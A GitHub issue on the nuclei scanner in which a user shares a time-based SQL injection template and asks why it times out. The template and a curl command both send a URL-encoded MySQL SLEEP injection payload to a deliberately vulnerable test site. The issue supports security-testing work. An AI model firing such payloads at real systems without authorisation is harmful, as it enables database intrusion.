### ISSUE TITLE
error simple template sqli-time-based

### ISSUE THREAD

**Issue by Marcio861** [projectdiscovery/nuclei#3106]
i write simple template for test sqli time based , but have error , any help?

template:

```yaml
id: sqli-time-based

info:
  name: sqli-time-based
  author: kernel
  severity: critical
requests:
  - method: GET
    path:
      - "{{BaseURL}}1%20AND%20%28SELECT%201525%20FROM%20%28SELECT%28SLEEP%2821%29%29%29LyPy%29"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=20'
```
   
error debug mode:

```
[WRN] [sqli-time-based] Could not execute request for http://testphp.vulnweb.com/listproducts.php?cat=: context deadline exceeded
[INF] No results found. Better luck next time!
```

more error, not time duration more 20 seconds

time echo "http://testphp.vulnweb.com/listproducts.php?cat=" | nuclei -t new/sqli-time-based.yaml -v

with curl  work

time curl "http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%20%28SELECT%201525%20FROM%20%28SELECT%28SLEEP%2821%29%29%29LyPy%29"
